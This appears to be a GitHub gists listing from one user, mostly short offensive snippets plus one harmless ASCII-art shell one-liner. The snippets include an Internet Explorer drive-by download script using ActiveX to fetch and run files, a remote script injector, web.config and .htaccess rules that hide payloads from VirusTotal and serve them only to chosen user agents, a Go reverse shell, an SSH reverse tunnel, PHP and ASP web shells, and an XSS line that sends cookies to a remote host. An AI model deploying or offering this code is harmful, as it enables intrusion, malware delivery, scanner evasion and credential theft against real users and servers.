ahhh
/ @@.sh
Last active
February 9, 2017 15:02
— forked from vitapluvia/@@.sh
This ascii flow art is called "Brick Wall", My first major change to the flow art series.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat /dev/urandom | xxd -b | cut -c 10-60 | sed 's/\(.*\)/\1\1/g' | sed 's/ //g' | sed 's/1/_/g' | sed 's/0/]/g' | sed 's/]]/[/g' | cut -c 10-60 | sed '/_/ s/$/]/' | sed '/_/ s/^/[/' |
ahhh
/ exec_mal.js
Created
February 17, 2015 10:46
Drive-by Download: Javascript, ActiveX, and WScript for Automatic Execution in IE on Windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script type="text/javascript"> | |
| function dl(fr, fn, rn) { | |
| var ws = new ActiveXObject("WScript.Shell"); | |
| var fn = ws.ExpandEnvironmentStrings("%TEMP%") + "\\" + String.fromCharCode(92) + fn; | |
| var xo = new ActiveXObject("MSXML2.XMLHTTP"); | |
| xo.onreadystatechange = function() { | |
| if (xo.readyState === 4) { | |
| var xa = new ActiveXObject("ADODB.Stream"); | |
| xa.open(); | |
| xa.type = 1; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script type="text/javascript"> | |
| var i,s,ss=['http://kathack.com/js/kh.js','http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js']; | |
| for(i=0;i!=ss.length;i++) | |
| { | |
| s=document.createElement('script'); | |
| s.src=ss[i]; | |
| document.body.appendChild(s); | |
| } | |
| void(0); | |
| </script> |
ahhh
/ web.config
Last active
August 29, 2015 14:16
web.config for tricking VT total to give legitimate URL scan results
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <configuration> | |
| <system.webServer> | |
| <security> | |
| <requestFiltering> | |
| <filteringRules> | |
| <!-- Rule for tricking VirusTotal URL scans --> | |
| <filteringRule name="user agent deny" scanUrl="false" scanQueryString="false"> | |
| <scanHeaders> | |
| <!-- apply rule to user-agent header --> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # targeted payload htaccess | |
| # no dir listing | |
| IndexIgnore * | |
| SetEnvIfNoCase User-Agent ".*Mozilla.*Mac.*" TARGET_UAS | |
| # default deny everything, then allow exceptions | |
| order Deny,Allow | |
| deny from all |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main; | |
| import "os/exec"; | |
| import "net"; | |
| func main() { | |
| con,_:=net.Dial("tcp","127.0.0.1:23"); | |
| cmd:=exec.Command("/bin/sh"); | |
| cmd.Stdin=con; | |
| cmd.Stdout=con; | |
| cmd.Stderr=con; | |
| cmd.Run(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # reverse connect client | |
| ssh -R 1337:localhost:22 [email protected] | |
| # control server | |
| ssh -p 1337 remoteuser@localhost |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php eval($_GET["cmd"]); ?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <% | |
| szCMD = request("cmd") | |
| Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) | |
| Set oFile = Server.CreateObject("Scripting.FileSystemObject").OpenTextFile (szTempFile, 1, False, 0) | |
| Response.Write Server.HTMLEncode(oFile.ReadAll) | |
| oFile.Close | |
| Call Server.CreateObject("Scripting.FileSystemObject").DeleteFile(szTempFile, True) | |
| %> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script type="text/javascript"> | |
| document.write("<iframe src='http://remotehost/whatever.ok?cookie="+document.cookie+"'></iframe>"); | |
| </script> |
OlderNewer